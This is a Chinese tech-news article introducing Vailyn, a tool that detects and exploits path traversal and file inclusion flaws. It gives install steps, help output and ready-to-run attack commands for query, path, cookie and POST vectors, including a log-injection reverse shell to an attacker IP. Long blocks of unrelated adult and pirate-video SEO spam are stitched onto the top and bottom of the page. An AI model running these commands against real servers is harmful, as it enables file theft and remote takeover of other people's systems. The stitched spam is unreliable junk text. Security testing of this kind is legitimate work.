精品欧美一区二区三区在线观看 _久久久久国色av免费观看性色_国产精品久久在线观看_亚洲第一综合网站_91精品又粗又猛又爽_小泽玛利亚一区二区免费_91亚洲精品国偷拍自产在线观看 _久久精品视频在线播放_美女精品久久久_欧美日韩国产成人在线

如何利用Vailyn識別路徑遍歷和文件包含漏洞

作者:Alpha_h4ck
安全 數據安全
Vailyn是一款多階段漏洞分析和利用工具,可以幫助廣大研究人員分析、識別和利用路徑遍歷漏洞以及文件包含漏洞。該工具的性能非常強,并且害實現了大量的過濾規避技術。

[[433744]]

關于Vailyn

Vailyn是一款多階段漏洞分析和利用工具,可以幫助廣大研究人員分析、識別和利用路徑遍歷漏洞以及文件包含漏洞。該工具的性能非常強,并且害實現了大量的過濾規避技術。

Vailyn的操作分為兩個階段。首先,它可以嘗試訪問/etc/passwd或用戶指定的文件來檢測漏洞是否存在。此時,我們可以自由選擇使用哪些Payload,而第二階段該工具將會使用我們所選擇的Payload。

第二階段是漏洞利用階段?,F在,該工具將會嘗試使用文件和目錄字典從目標服務器提取所有可能的文件。搜索深度和目錄排列級別可以通過參數進行調整?;蛘?,它可以下載找到的文件,并將它們保存在其loot文件夾中。除此之外,Vailyn還會嘗試在目標系統上獲取一個反向Shell,并允許攻擊者獲得對目標服務器的完全控制。

當前版本的Vailyn支持多種攻擊向量:通過查詢實現注入、路徑、Cookie和POST數據等。

工具安裝

我們建議的Vailyn運行環境為Python 3.7+,但理論上來說該工具應當適用于Python 3.5或Python 3.6環境。

如需安裝Vailyn,可以直接訪問該項目的【Releases頁面】下載工具文檔,或使用下列命令將該項目源碼克隆至本地:

  1. $ git clone https://github.com/VainlyStrain/Vailyn 

下載好項目源碼之后,我們則需要安裝好該工具所需的Python依賴組件。

(1) Unix系統

在Unix系統上,可以直接運行下列命令:

  1. $ pip install -r requirements.txt   # --user 

(2) Windows系統

在Windows系統上,可以直接使用pip命令來安裝“Vailyn\·›\requirements-windows.txt”中列出的依賴組件。

(3) 最后一步

如果你想要使用反向Shell模塊的完整功能,我們還需要安裝sshpass、ncat和konsole。

接下來,我們就可以直接運行下列命令來使用Vailyn了:

  1. $ python Vailyn -h 

工具使用

Vailyn提供了三個必要參數:-v VIC, -a INT和-p2 TP P1 P2。如果使用了-a參數的話,則可以支持更多選項。

  1. ,                \                  /               , 
  2.  
  3.      ':.             \.      /\.     ./            .:' 
  4.  
  5.         ':;.          :\ .,:/   ''. /;        ..::' 
  6.  
  7.            ',':.,.__.'' '          ' `:.__:''.:' 
  8.  
  9.               ';..                        ,;'     * 
  10.  
  11.        *         '.,                   .:' 
  12.  
  13.                     `v;.            ;v'        o 
  14.  
  15.               .      '  '..      :.' '     . 
  16.  
  17.                      '     ':;, '    ' 
  18.  
  19.             o                '          .   :         
  20.  
  21.                                            * 
  22.                          | Vailyn | 
  23.  
  24.                       [ VainlyStrain ]     
  25. Vsynta Vailyn -v VIC -a INT -p2 TP P1 P2 
  26.  
  27.         [-p PAM] [-i F] [-Pi VIC2] 
  28.  
  29.       [-c C] [-n] [-d I J K] 
  30.  
  31.        [-s T] [-t] [-L] 
  32.  
  33.   [-l] [-P] [-A]  
  34.  
  35. mandatory: 
  36.  
  37.   -v VIC, --victim VIC  Target to attack, part 1 [pre-payload] 
  38.  
  39.   -a INT, --attack INT  Attack type (int, 1-5, or A) 
  40.  
  41.     A|  Spider (all)       2|  Path               5|  POST Data, json 
  42.  
  43.     P|  Spider (partial)   3|  Cookie 
  44.  
  45.     1|  Query Parameter    4|  POST Data, plain 
  46.  
  47.   -p2 TP P1 P2, --phase2 TP P1 P2 
  48.  
  49.                         Attack in Phase 2, and needed parameters 
  50.   
  51. ┌[ Values ]─────────────┬────────────────────┐ 
  52.  
  53. │ TP      │ P1          │ P2                 │ 
  54.  
  55. ├─────────┼─────────────┼────────────────────┤ 
  56.  
  57. │ leak    │ File Dict   │ Directory Dict     │ 
  58.  
  59. │ inject  │ IP Addr     │ Listening Port     │ 
  60.  
  61. │ implant │ Source File │ Server Destination │ 
  62.  
  63. └─────────┴─────────────┴────────────────────┘ 
  64.  
  65.   
  66.  
  67. additional: 
  68.  
  69.   -p PAM, --param PAM   query parameter or POST data for --attack 1, 4, 5 
  70.  
  71.   -i F, --check F       File to check for in Phase 1 (df: etc/passwd) 
  72.  
  73.   -Pi VIC2, --vic2 VIC2 Attack Target, part 2 [post-payload] 
  74.  
  75.   -c C, --cookie C      Cookie to append (in header format) 
  76.  
  77.   -l, --loot            Download found files into the loot folder 
  78.  
  79.   -d I J K, --depths I J K 
  80.  
  81.                         depths (I: phase 1, J: phase 2, K: permutation level) 
  82.  
  83.   -h, --help            show this help menu and exit 
  84.  
  85.   -s T, --timeout T     Request Timeout; stable switch for Arjun 
  86.  
  87.   -t, --tor             Pipe attacks through the Tor anonymity network 
  88.  
  89.   -L, --lfi             Additionally use PHP wrappers to leak files 
  90.  
  91.   -n, --nosploit        skip Phase 2 (does not need -p2 TP P1 P2) 
  92.  
  93.   -P, --precise         Use exact depth in Phase 1 (not a range) 
  94.  
  95.   -A, --app             Start Vailyn's Qt5 interface 
  96.  
  97.   
  98.  
  99. develop: 
  100.  
  101.   --debug               Display every path tried, even 404s. 
  102.  
  103.   --version             Print program version and exit. 
  104.  
  105.   --notmain             Avoid notify2 crash in subprocess call.  
  106.  
  107. Info: 
  108.  
  109.   to leak files using absolute paths: -d 0 0 0 
  110.  
  111.   to get a shell using absolute paths: -d 0 X 0 

Vailyn當前支持五種攻擊向量,并且提供了自動化爬蟲。我們可以通過-a INT參數來選擇需要執行的攻擊:

  1. INT        attack 
  2.  
  3. ----       ------- 
  4.  
  5. 1          query-based attack  (https://site.com?file=../../../) 
  6.  
  7. 2          path-based attack   (https://site.com/../../../) 
  8.  
  9. 3          cookie-based attack (will grab the cookies for you) 
  10.  
  11. 4          plain post data     (ELEM1=VAL1&ELEM2=../../../) 
  12.  
  13. 5          json post data      ({"file": "../../../"}) 
  14.  
  15. A          spider              fetch + analyze all URLs from site using all vectors 
  16.  
  17. P          partial spider      fetch + analyze all URLs from site using only selected vectors 

工具使用演示

簡單的查詢攻擊,第二階段文件提取:

  1. $ Vailyn -v "http://site.com/download.php" -a 1 -p2 leak dicts/files dicts/dirs -p file --> http://site.com/download.php?file=../INJECT 

簡單的查詢,但知道file.php已存在:

  1. $ Vailyn -v "http://site.com/download.php" -a 1 -p2 leak dicts/files dicts/dirs -p file -i file.php -d 2 X X -P 

簡單的路徑攻擊:

  1. $ Vailyn -v "http://site.com/" -a 2 -p2 leak dicts/files dicts/dirs --> http://site.com/../INJECT 

路徑攻擊,但需要查詢參數和標簽:

  1. $ Vailyn -v "http://site.com/" -a 2 -p2 leak dicts/files dicts/dirs -Pi "?token=X#title" --> http://site.com/../INJECT?token=X#title 

簡單的Cookie攻擊:

  1. $ Vailyn -v "http://site.com/cookiemonster.php" -a 3 -p2 leak dicts/files dicts/dirs 

POST Plain攻擊:

  1. $ Vailyn -v "http://site.com/download.php" -a 4 -p2 leak dicts/files dicts/dirs -p "DATA1=xx&DATA2=INJECT

POST JSON攻擊:

  1. $ Vailyn -v "http://site.com/download.php" -a 5 -p2 leak dicts/files dicts/dirs -p '{"file": "INJECT"}' 

攻擊,但目標存在登錄界面:

  1. $ Vailyn -v "http://site.com/" -a 1 -p2 leak dicts/files dicts/dirs -c "sessionid=foobar

攻擊,但需要一個反向Shell(端口1337):

  1. $ Vailyn -v "http://site.com/download.php" -a 1 -p2 inject MY.IP.IS.XX 1337 # a high Phase 2 Depth is needed for log injection 

完全的爬蟲自動化模式:

  1. $ Vailyn -v "http://root-url.site" -a A 

工具演示視頻

視頻地址:【點我觀看

項目地址

Vailyn:【GitHub傳送門

 

責任編輯:趙寧寧 來源: FreeBuf
Vailyn漏洞安全工具
相關推薦

2017-07-17 13:30:31

2009-07-06 17:47:44

2017-05-02 09:02:14

2020-10-13 10:29:31

面部識別設備惡意攻擊漏洞

2009-12-09 09:49:40

2010-03-02 14:55:18

2025-04-03 10:01:14

2025-05-23 10:04:25

2011-04-13 17:28:21

2015-04-02 16:26:39

漏洞檢測工具Kadimus

2011-05-18 09:47:48

2025-09-28 09:16:34

2011-03-18 10:23:27

2025-02-21 08:10:00

漏洞網絡安全網絡攻擊

2021-10-14 13:14:12

安全供應鏈漏洞威脅

2021-12-26 07:43:50

aDLLDLL漏洞

2021-03-26 13:49:29

人工智能AI深度學習

2021-11-10 11:51:33

BrakTooth安全漏洞藍牙設備

2021-03-06 09:50:43

漏洞網絡安全網絡攻擊

2009-07-06 17:34:20

PEARMail函數php
點贊
收藏

51CTO技術棧公眾號

国产视频福利在线| 91美女免费看| 国产精品久久久久久av公交车| 亚洲天堂免费看| 国产一区二区高清不卡| 亚洲色成人www永久网站| 97精品一区二区| 精品国产一二三| 青青青国产在线视频| 成人免费网址| 91丨九色丨蝌蚪富婆spa| 国产精品成人免费视频| 欧美成人一区二区三区高清| 羞羞色国产精品网站| 欧美日韩中文国产| 国产毛片视频网站| 男人天堂久久久| 99麻豆久久久国产精品免费优播| 国产精品嫩草影院久久久| 欧美三级在线免费观看| chinese国产精品| 亚洲区小说区图片区| 免费看日韩精品| 国内精品久久久久久影视8| 极品人妻videosss人妻| 7m精品国产导航在线| 在线观看免费亚洲| 人妻久久久一区二区三区| 欧美三级黄网| 久久久久久久久久久电影| 亚洲a区在线视频| 波多野结衣一区二区在线| 黄色亚洲在线| 久久精品久久精品亚洲人| 在线免费观看黄色小视频| 欧洲一区在线| 欧美精品一级二级| 欧美黄网站在线观看| 成人影音在线| 亚洲激情第一区| 正在播放一区二区三区| 黄网站在线观看| 久久综合色天天久久综合图片| 97久久天天综合色天天综合色hd| 中文字幕视频二区| 久久综合网络一区二区| 精品国偷自产在线视频| 精品久久久久一区二区| 久久久久久久久久久久电影| 欧美日韩国产综合草草| 日韩一级理论片| 中文字幕在线免费观看视频| 天天影视网天天综合色在线播放 | 情侣黄网站免费看| 美女高潮在线观看| 丰满岳妇乱一区二区三区| 又大又硬又爽免费视频| 男女免费观看在线爽爽爽视频| 亚洲三级理论片| 国产精品久久成人免费观看| av影片免费在线观看| 国产免费观看久久| 亚州欧美一区三区三区在线| av基地在线| 国产精品理论片在线观看| 亚洲欧美99| 老司机精品视频在线观看6| 成人欧美一区二区三区视频网页| 亚洲一卡二卡三卡四卡无卡网站在线看| 国产在线播放av| 中文字幕的久久| 国产高清精品软男同| av免费在线观看网址| 亚洲综合在线视频| 久久精品国产sm调教网站演员| 国模雨婷捆绑高清在线| 欧美日韩国产在线看| 97xxxxx| 欧美影视资讯| 欧美疯狂做受xxxx富婆| 中文字幕久久久久久久| 精品精品精品| 亚洲欧美日韩图片| 战狼4完整免费观看在线播放版| 国产精品久久久久久久久妇女| 久久中文精品视频| 国产精品第56页| 日韩国产高清在线| 91久久久精品| 香蕉视频免费在线看| 国产日产欧美一区二区视频| 五月天av影院| 福利影院在线看| 在线观看一区二区精品视频| 超碰在线超碰在线| 西瓜成人精品人成网站| 中文字幕在线看视频国产欧美在线看完整 | 国产极品在线视频| 精品成人免费一区二区在线播放| 67194成人在线观看| 熟妇人妻久久中文字幕| 日本欧美国产| 午夜精品久久久久久久久久久久久 | 日韩一级精品| 国产精品主播视频| 好男人在线视频www| 国产欧美综合在线| 免费看欧美一级片| 日韩欧美三区| 亚洲精选中文字幕| 欧美日韩精品在线观看视频| 丝袜诱惑制服诱惑色一区在线观看 | av电影天堂一区二区在线观看| 四虎永久国产精品| 国产剧情av在线播放| 欧美日本乱大交xxxxx| 国产麻豆xxxvideo实拍| 欧美高清在线| 日本精品久久电影| 精品国产区一区二| 国产精品久久三| 男人操女人免费软件| 日韩精品视频在线看| 国产亚洲精品久久久优势| 国产大片中文字幕在线观看| 狠狠网亚洲精品| 亚洲三区四区| 素人一区二区三区| 亚洲午夜精品视频| 男人日女人网站| a美女胸又www黄视频久久| 欧美做暖暖视频| 懂色av色香蕉一区二区蜜桃| 中文字幕亚洲一区在线观看 | 亚洲欧美日本日韩| 国产精品亚洲一区| 久草在线视频资源| 日韩一区二区三区视频在线观看| 亚洲女人毛茸茸高潮| 日韩精品亚洲专区| 日本午夜精品电影| 欧美大胆性生话| 亚洲日韩欧美视频| 手机av免费观看| 久久久久久免费毛片精品| avav在线看| 红桃成人av在线播放| 日本aⅴ大伊香蕉精品视频| 亚洲欧洲视频在线观看| 欧美性生交xxxxxdddd| jlzzjizz在线播放观看| 国产深夜精品| 精品无人区一区二区三区| 丁香花在线观看完整版电影| 在线观看免费一区| 日日操免费视频| 日韩精品一二三区| 日韩成人在线资源| 日韩一区二区三区四区五区 | 欧美极品xxxx| 国产一区二区三区视频免费观看| 亚洲欧洲成人av每日更新| 黄色av免费在线播放| 台湾色综合娱乐中文网| 97视频在线观看视频免费视频| 亚洲成人一级片| 亚洲一区二区三区免费视频| 无码人妻一区二区三区一| 亚洲精品小说| 亚洲在线观看视频| 99自拍视频在线观看| 精品视频色一区| 中日韩一级黄色片| 国产美女主播视频一区| 成人午夜免费剧场| 久久gogo国模啪啪裸体| 欧美成年人视频网站| 三级网站免费观看| 亚洲成人你懂的| 内射中出日韩无国产剧情| 亚洲深夜福利| 久久国产精品-国产精品| 国产韩日精品| 久久综合久久美利坚合众国| av资源免费看| 亚洲成人免费观看| 第四色在线视频| 免费在线观看精品| 米仓穗香在线观看| 女一区二区三区| 日韩美女主播视频| 欧美96在线| 欧美大肚乱孕交hd孕妇| 在线免费观看毛片| 久久久国产精品麻豆| 看看黄色一级片| 国产色综合网| 亚洲精品乱码视频| 欧美日韩国产一区二区在线观看| 欧美激情一区二区久久久| 成人午夜视频一区二区播放| 欧洲一区二区三区免费视频| 欧美性生交大片| 懂色av中文字幕一区二区三区| 日韩精品―中文字幕| 欧美激情在线精品一区二区三区| 91精品入口蜜桃| 欧洲av不卡| 欧美老女人性视频| 免费在线黄色网址| 欧美xingq一区二区| 日韩欧美国产另类| 一区二区国产盗摄色噜噜| 公侵犯人妻一区二区三区| 精品一区免费av| 999精品网站| 亚洲网站在线| 亚洲精品中文综合第一页| 东京久久高清| 国产精品久久久久久搜索| 99爱在线观看| 日韩中文字幕亚洲| 亚洲 美腿 欧美 偷拍| 在线不卡免费欧美| 日本一区二区三区久久| 午夜精品福利一区二区蜜股av | 国产aaa免费视频| 99热国内精品| 日韩av一区二区三区在线| 超碰成人在线观看| 国产日韩精品在线| 神马电影网我不卡| 欧美国产日本高清在线| 3p视频在线观看| 国产午夜精品理论片a级探花| 国产丝袜在线视频| 欧美一区二区三区在线| 伊人网中文字幕| 精品视频全国免费看| 老熟妇仑乱一区二区av| 欧美日韩性视频在线| 一区二区成人免费视频| 国产精品久久久久久久久搜平片| 中文字幕在线永久| 国产成人av福利| 亚洲综合伊人久久| 美女尤物国产一区| 欧美极品欧美精品欧美| 亚洲在线成人| 777精品久无码人妻蜜桃| 狠狠综合久久| 日日噜噜夜夜狠狠久久丁香五月| 你懂的国产精品永久在线| 天天综合中文字幕| 999国产精品| 中国人体摄影一区二区三区| 国产欧美久久一区二区三区| 三级三级久久三级久久18| 亚洲日产av中文字幕| 免费成人深夜夜行视频| 日韩高清成人在线| 欧美一区1区三区3区公司| 国产一区二区观看| 欧洲亚洲一区二区三区四区五区| 丝袜久久网站| 一本一本久久a久久精品综合妖精| 久久综合亚洲| 日韩影视精品| 国产精品99一区二区三| 老子影院午夜伦不卡大全| 亚洲人体偷拍| 免费看国产曰批40分钟| 亚洲深夜影院| 色国产在线视频| 国产一区二区三区四区五区美女 | 国产精品美女久久久久久久| 欧日韩不卡视频| 亚洲欧洲另类国产综合| 四虎永久免费在线| 亚洲欧美色图小说| 日本免费观看视| 一本一本大道香蕉久在线精品 | 牛夜精品久久久久久久99黑人| 91精品一区二区三区四区| 国产精品综合| 91视频免费版污| 国产在线精品不卡| 95视频在线观看| 欧美激情一区二区| 亚洲一级生活片| 亚洲午夜在线电影| 国产精品suv一区| 91精品国产综合久久香蕉麻豆 | 精品国产免费人成在线观看| 污污网站免费在线观看| 日韩在线视频网站| 男人添女人下部高潮视频在线观看| 久久人人爽人人| 99re66热这里只有精品4| 99www免费人成精品| 欧美日韩一区二区三区四区不卡 | 国产美女av一区二区三区| 丰满人妻一区二区三区免费视频棣| 91理论电影在线观看| 国产传媒国产传媒| 午夜精品久久久久久| 国产乡下妇女三片| 日韩欧美中文一区| 日本黄在线观看| 欧美国产日产韩国视频| 三上悠亚激情av一区二区三区 | 国产精品动漫网站| 久久99精品久久久久久动态图| www.四虎在线| 亚洲女人的天堂| 国产91精品看黄网站在线观看| 91精品国产麻豆国产自产在线| 婷婷久久久久久| 欧美日韩国产第一页| 亚洲成av在线| 国产精选一区二区| 国产精品一区二区av交换| 777777av| 国产精品一二三四| 亚洲女优在线观看| 色94色欧美sute亚洲线路二| 性猛交xxxx乱大交孕妇印度| 中文字幕亚洲综合久久| 欧美a级在线观看| 国产精品视频免费一区| 久久久久蜜桃| 91人人澡人人爽人人精品| 99国产精品一区| 国产亚洲精品女人久久久久久| 欧美色综合久久| 日本大臀精品| 青青草原一区二区| 欧美一区二区三区红桃小说| 欧美日韩中文字幕在线播放| 久久精品久久综合| 东京热无码av男人的天堂| 狠狠久久五月精品中文字幕| 亚洲第一第二区| 久久天天躁夜夜躁狠狠躁2022| 亚洲人免费短视频| 精选一区二区三区四区五区| 亚洲天堂男人| 添女人荫蒂视频| 婷婷综合另类小说色区| 性生交大片免费看女人按摩| 日韩中文字幕在线免费观看| 忘忧草在线www成人影院| 九九九九九精品| 亚洲一区二区成人| 日韩精品电影一区二区| 精品美女永久免费视频| 国产小视频一区| 欧美性受xxxx白人性爽| 麻豆成人入口| 影音先锋成人资源网站| 精品亚洲国产成人av制服丝袜| 免费在线观看一级片| 日韩一区二区三区电影在线观看| 欧美三级电影一区二区三区| 国产精品丝袜高跟| 国产成人精品一区二区免费看京 | 久久久久久久久久久久久久| 污污网站免费观看| 综合久久一区二区三区| 国产伦精品一区二区三区免.费 | 免费看的黄色欧美网站| 国产精品无码一区二区三| 夜夜揉揉日日人人青青一国产精品| 亚洲免费成人在线| 久久久综合av| 天堂99x99es久久精品免费| 亚洲 欧美 日韩系列| 国产精品久久久久久亚洲伦| 亚洲视频一区二区三区四区| 色狠狠久久aa北条麻妃 | 99porn视频在线| 狠狠88综合久久久久综合网| 实拍女处破www免费看| 欧洲激情一区二区| 日本在线人成| 国产在线观看一区二区三区| 欧美日韩国产欧| av无码一区二区三区| 在线观看视频一区| 欧美大片黄色| 免费在线成人av| 乱一区二区av| 日韩特级黄色片| 深夜福利一区二区| 久久av偷拍| 午夜免费精品视频| 一区二区三区美女| 九色在线免费| 国产精品久久久久久久电影| 亚洲女同一区|